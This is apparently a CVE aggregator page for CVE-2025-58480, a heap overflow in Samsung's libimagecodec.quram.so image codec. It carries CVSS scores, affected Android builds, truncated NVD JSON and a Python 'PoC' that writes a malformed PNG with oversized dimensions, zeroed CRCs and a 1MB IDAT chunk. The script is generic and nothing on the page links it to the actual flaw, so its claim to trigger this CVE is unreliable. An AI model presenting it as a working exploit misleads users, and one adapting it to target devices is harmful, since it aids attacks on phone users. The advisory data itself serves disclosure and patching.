Security Vulnerability Report
中文
CVE-2025-58480 CVSS 4.3 MEDIUM

CVE-2025-58480

Published: 2025-12-02 02:15:48
Last Modified: 2025-12-05 19:09:15
Source: [email protected]

Description

Heap-based buffer overflow in libimagecodec.quram.so prior to SMR Dec-2025 Release 1 allows remote attackers to access out-of-bounds memory.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:o:samsung:android:13.0:-:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:samsung:android:13.0:smr-apr-2022-r1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:samsung:android:13.0:smr-apr-2023-r1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:samsung:android:13.0:smr-apr-2024-r1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:samsung:android:13.0:smr-apr-2025-r1:*:*:*:*:*:* - VULNERABLE
Samsung移动设备(Android)< SMR Dec-2025 Release 1
libimagecodec.quram.so < Dec-2025版本
使用quram图像编解码库的所有Samsung设备

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-58480 PoC - Samsung libimagecodec.quram.so Heap Buffer Overflow # This PoC demonstrates the heap buffer overflow in Samsung's image codec library # Note: This is for educational and security research purposes only import struct import os def create_malicious_image(): """ Generate a malicious image file that triggers the buffer overflow in libimagecodec.quram.so """ # Craft malicious image header with oversized data field header = b'\x89PNG\r\n\x1a\n' # Create IHDR chunk with malicious dimensions # Width and height fields can be manipulated to trigger overflow ihdr_data = struct.pack('>II', 0x7FFFFFFF, 0x7FFFFFFF) # Oversized dimensions ihdr_crc = 0x00000000 # CRC placeholder ihdr_chunk = struct.pack('>I', 13) + b'IHDR' + ihdr_data + struct.pack('>I', ihdr_crc) # Craft IDAT chunk with oversized compressed data # This triggers the heap buffer overflow during decompression oversized_data = b'\x00' * 0x100000 # 1MB of data to overflow buffer idat_data = oversized_data idat_crc = 0x00000000 idat_chunk = struct.pack('>I', len(idat_data)) + b'IDAT' + idat_data + struct.pack('>I', idat_crc) # IEND chunk to complete PNG structure iend_chunk = struct.pack('>I', 0) + b'IEND' + struct.pack('>I', 0xAE426082) # Combine all chunks to form malicious PNG malicious_png = header + ihdr_chunk + idat_chunk + iend_chunk return malicious_png def main(): print("[*] CVE-2025-58480 PoC Generator") print("[*] Target: Samsung libimagecodec.quram.so") print("[*] Vulnerability: Heap-based buffer overflow") # Generate malicious image poc_data = create_malicious_image() # Save PoC file output_file = "CVE-2025-58480_poc.png" with open(output_file, 'wb') as f: f.write(poc_data) print(f"[+] PoC file created: {output_file}") print(f"[+] File size: {len(poc_data)} bytes") print("[!] This PoC is for research purposes only") if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-58480", "sourceIdentifier": "[email protected]", "published": "2025-12-02T02:15:47.803", "lastModified": "2025-12-05T19:09:14.650", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Heap-based buffer overflow in libimagecodec.quram.so prior to SMR Dec-2025 Release 1 allows remote attackers to access out-of-bounds memory."}, {"lang": "es", "value": "Desbordamiento de búfer basado en montículo en libimagecodec.quram.so versiones anteriores a SMR Dec-2025 Release 1 permite a atacantes remotos acceder a la memoria fuera de los límites."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:samsung:android:13.0:-:*:*:*:*:*:*", "matchCriteriaId": "A123EDB1-3048-44B0-8D4D-39A2B24B5F6B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:samsung:android:13.0:smr-apr-2022-r1:*:*:*:*:*:*", "matchCriteriaId": "BDE4D65E-8F9B-4810-AED6-95564A97D741"}, {"vulnerable": true, "criteria": "cpe:2.3:o:samsung:android:13.0:smr-apr-2023-r1:*:*:*:*:*:*", "matchCriteriaId": "70825981-F895-4BFD-9B6E-92BFF0D67023"}, {"vulnerable": true, "criteria": "cpe:2.3:o:samsung:android:13.0:smr-apr-2024-r1:*:*:*:*:*:*", "matchCriteriaId": "A5E68B7B-BA08-4E8C-B60A-B3836C6986BC"}, {"vulnerable": true, "criteria": "cpe:2.3:o:samsung:android:13.0:smr-apr-2025-r1:*:*:*:*:*:*", "matchCriteriaId": "AC42E785-02BF-4F27-B5CF-49572A2DBC8E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:samsung:android:13.0:smr-aug-2022-r1:*:*:*:*:*:*", "matchCriteriaId": "0AF1EDA0-2712-4C3C-8D8A-89E154BB63DF"}, {"vulnerable": true, "criteria": "cpe:2.3:o:samsung:android:13.0:smr-aug-2023-r1:*:*:*:*:*:*", "matchCriteriaId": "88DC0A82-CAF3-4E88-8A4D-8AF79D0C226D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:samsung:android:13.0:smr-aug-2024-r1:*:*:*:*:*:*", "matchCriteriaId": "6239D93F-CA0E-4120-96A1-FB63276EAEE8"}, {"vulnerable": true, "criteria": "cpe:2.3:o:samsung:android:13.0:smr-aug-2025-r1:*:*:*:*:*:*", "matchCriteriaId": "25F19D02-1FFC-48AF-9CB8-063C459E7A4B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:samsung:android:13.0:smr-dec-2021-r1:*:*:*:*:*:*", "matchCriteriaId": "CD382E2D-0B51-4908-989A-88E083FC85BF"}, {"vulnerable": true, "criteria": "cpe:2.3:o:samsung:android:13.0:smr-dec-2022-r1:*:*:*:*:*:*", "matchCriteriaId": "299284DA-85AB-4162-B858-E67E5C6C14F7"}, {"vulnerable": true, "criteria": "cpe:2.3:o:samsung:android:13.0:smr-dec-2023-r1:*:*:*:*:*:*", "matchCriteriaId": "38B7AB56-AB65-4557-A91C-40CA2FD12351"}, {"vulnerable": true, "criteria": "cpe:2.3:o:samsung:android:13.0:smr-dec-2024-r1:*:*:*:*:*:*", "matchCriteriaId": "858B0736-2272-4D5A-A77F-47023D21F7D0"}, {"vulnerable": true, "criteria": "cpe:2.3:o:samsung:android:13.0:smr-feb-2022-r1:*:*:*:*:*:*", "matchCriteriaId": "61D507C0-086B-4139-A560-126964DFA579"}, {"vulnerable": true, "criteria": "cpe:2.3:o:samsung:android:13.0:smr-feb-2023-r1:*:*:*:*:*:*", "matchCriteriaId": "D98F307E-3B01-4C17-86E5-1C6299919417"}, {"vulnerable": true, "criteria": "cpe:2.3:o:samsung:android:13.0:smr-feb-2024-r1:*:*:*:*:*:*", "matchCriteriaId": "952CA843-7CF0-4424-BDA4-3F2A93E077B6"}, {"vulnerable": true, "criteria": "cpe:2.3:o:samsung:android:13.0:smr-feb-2025-r1:*:*:*:*:*:*", "matchCriteriaId": "39F64BAA-2E49-4919-A940-219391383D5E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:samsung:android:13.0:smr-jan-2022-r1:*:*:*:*:*:*", "matchCriteriaId": "57B125ED-D939-4CBC-9E96-BBCF02402A69"}, {"vulnerable": true, "criteria": "cpe:2.3:o:samsung:android:13.0:smr-jan-2023-r1:*:*:*:*:*:*", "matchCriteriaId": "7D7DA96D-9C25-4DDA-A6BF-D998AC346B89"}, {"vulnerable": true, "criteria": "cpe:2.3:o:samsung:android:13.0:smr-jan-2024-r1:*:*:*:*:*:*", "matchCriteriaId": "07AC19C6-D245-4C3A-90CC-A931A901EA0A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:samsung:android:13.0:smr-jan-2025-r1:*:*:*:*:*:*", "matchCriteriaId": "FDA1685E-D101-46F6-8857-7F08 ... (truncated)
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.